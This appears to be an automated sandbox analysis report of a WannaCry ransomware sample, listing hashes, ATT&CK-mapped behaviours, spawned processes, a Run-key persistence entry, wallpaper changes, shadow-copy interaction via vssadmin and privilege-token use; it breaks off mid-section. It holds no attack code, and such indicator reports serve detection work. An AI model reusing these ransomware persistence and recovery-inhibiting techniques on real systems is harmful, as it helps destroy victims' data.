wannacry | ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

General

Target

wanacryptor.exe
Size

3.4MB
MD5

84c82835a5d21bbcf75a61706d8ab549
SHA1

5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
SHA256

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
SHA512

90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

Score

10^/10

wannacry discovery persistence ransomware worm

Malware Config

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Executes dropped EXE 10 IoCs

Processes:

taskdl.exe@[email protected]@[email protected]taskhsvc.exetaskse.exe@[email protected]taskdl.exetaskdl.exetaskse.exe@[email protected]

pid	process
3648	taskdl.exe
2760	@[email protected]
648	@[email protected]
1700	taskhsvc.exe
3444	taskse.exe
4000	@[email protected]
3792	taskdl.exe
3372	taskdl.exe
3336	taskse.exe
3960	@[email protected]

Drops startup file 1 IoCs

Processes:

wanacryptor.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDEE3D.tmp	wanacryptor.exe

Loads dropped DLL 7 IoCs

Processes:

taskhsvc.exe

pid process

1700 taskhsvc.exe
1700 taskhsvc.exe
1700 taskhsvc.exe
1700 taskhsvc.exe
1700 taskhsvc.exe
1700 taskhsvc.exe
1700 taskhsvc.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

1396 icacls.exe

pid	process
1700	taskhsvc.exe
1700	taskhsvc.exe
1700	taskhsvc.exe
1700	taskhsvc.exe
1700	taskhsvc.exe
1700	taskhsvc.exe
1700	taskhsvc.exe

pid	process
1396	icacls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\wxsrckoarcbwb464 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\tasksche.exe\""	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

wanacryptor.exe@[email protected]

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2258850686-2386187288-1281961708-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	wanacryptor.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2258850686-2386187288-1281961708-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

CompatTelRunner.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\LowerFilters	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0009\en	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\000E	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&135b206d&0&000000\UpperFilters	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&135b206d&0&000000\Properties\{4321918b-f69e-470d-a5de-4d88c75ad24b}\0013	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\en	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0009	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&135b206d&0&010000\UpperFilters	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&135b206d&0&000000\DeviceDesc	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&135b206d&0&010000\DeviceDesc	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003\en-US	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0002\	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0002\en-US	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\en	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&135b206d&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003\	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&135b206d&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\en	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\UpperFilters	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0004	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0014	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\000E	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0013	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0009	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\en	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&135b206d&0&010000	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0002\	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&135b206d&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0002	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\en-US	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&135b206d&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0009	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\DeviceDesc	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0009\	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0006	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0005	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\en-US	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Mfg	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0024	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0002	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\FriendlyName	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003\	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&135b206d&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&135b206d&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0014	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003\	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0002	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&135b206d&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0004	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&135b206d&0&000000	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&135b206d&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000D	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\en	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{4321918b-f69e-470d-a5de-4d88c75ad24b}\0014	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&135b206d&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&135b206d&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002	CompatTelRunner.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003\en	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&135b206d&0&000000\Properties\{4321918b-f69e-470d-a5de-4d88c75ad24b}\0014	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&135b206d&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	CompatTelRunner.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	CompatTelRunner.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer	rundll32.exe

Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

3360 vssadmin.exe

pid	process
3360	vssadmin.exe

Modifies data under HKEY_USERS 49 IoCs

Processes:

CompatTelRunner.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\19\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	CompatTelRunner.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\19\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update"	CompatTelRunner.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\19\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption"	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	CompatTelRunner.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\19\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust"	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	CompatTelRunner.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\19\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)"	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	CompatTelRunner.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\19\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption"	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	CompatTelRunner.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\19\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent"	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	CompatTelRunner.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	CompatTelRunner.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

940 reg.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

taskhsvc.exe

pid process

1700 taskhsvc.exe
1700 taskhsvc.exe
1700 taskhsvc.exe
1700 taskhsvc.exe
1700 taskhsvc.exe
1700 taskhsvc.exe

pid	process
940	reg.exe

pid	process
1700	taskhsvc.exe
1700	taskhsvc.exe
1700	taskhsvc.exe
1700	taskhsvc.exe
1700	taskhsvc.exe
1700	taskhsvc.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

taskse.exevssvc.exeWMIC.exetaskse.exe

description	pid	process
Token: SeTcbPrivilege	3444	taskse.exe
Token: SeTcbPrivilege	3444	taskse.exe
Token: SeBackupPrivilege	2864	vssvc.exe
Token: SeRestorePrivilege	2864	vssvc.exe
Token: SeAuditPrivilege	2864	vssvc.exe
Token: SeIncreaseQuotaPrivilege	2756	WMIC.exe
Token: SeSecurityPrivilege	2756	WMIC.exe
Token: SeTakeOwnershipPrivilege	2756	WMIC.exe
Token: SeLoadDriverPrivilege	2756	WMIC.exe
Token: SeSystemProfilePrivilege	2756	WMIC.exe
Token: SeSystemtimePrivilege	2756	WMIC.exe
Token: SeProfSingleProcessPrivilege	2756	WMIC.exe
Token: SeIncBasePriorityPrivilege	2756	WMIC.exe
Token: SeCreatePagefilePrivilege	2756	WMIC.exe
Token: SeBackupPrivilege	2756	WMIC.exe
Token: SeRestorePrivilege	2756	WMIC.exe
Token: SeShutdownPrivilege	2756	WMIC.exe
Token: SeDebugPrivilege	2756	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2756	WMIC.exe
Token: SeRemoteShutdownPrivilege	2756	WMIC.exe
Token: SeUndockPrivilege	2756	WMIC.exe
Token: SeManageVolumePrivilege	2756	WMIC.exe
Token: 33	2756	WMIC.exe
Token: 34	2756	WMIC.exe
Token: 35	2756	WMIC.exe
Token: 36	2756	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2756	WMIC.exe
Token: SeSecurityPrivilege	2756	WMIC.exe
Token: SeTakeOwnershipPrivilege	2756	WMIC.exe
Token: SeLoadDriverPrivilege	2756	WMIC.exe
Token: SeSystemProfilePrivilege	2756	WMIC.exe
Token: SeSystemtimePrivilege	2756	WMIC.exe
Token: SeProfSingleProcessPrivilege	2756	WMIC.exe
Token: SeIncBasePriorityPrivilege	2756	WMIC.exe
Token: SeCreatePagefilePrivilege	2756	WMIC.exe
Token: SeBackupPrivilege	2756	WMIC.exe
Token: SeRestorePrivilege	2756	WMIC.exe
Token: SeShutdownPrivilege	2756	WMIC.exe
Token: SeDebugPrivilege	2756	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2756	WMIC.exe
Token: SeRemoteShutdownPrivilege	2756	WMIC.exe
Token: SeUndockPrivilege	2756	WMIC.exe
Token: SeManageVolumePrivilege	2756	WMIC.exe
Token: 33	2756	WMIC.exe
Token: 34	2756	WMIC.exe
Token: 35	2756	WMIC.exe
Token: 36	2756	WMIC.exe
Token: SeTcbPrivilege	3336	taskse.exe
Token: SeTcbPrivilege	3336	taskse.exe

Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

@[email protected]@[email protected]@[email protected]@[email protected]

pid	process
648	@[email protected]
2760	@[email protected]
648	@[email protected]
2760	@[email protected]
4000	@[email protected]
4000	@[email protected]
3960	@[email protected]

Suspicious use of WriteProcessMemory 62 IoCs

Processes:

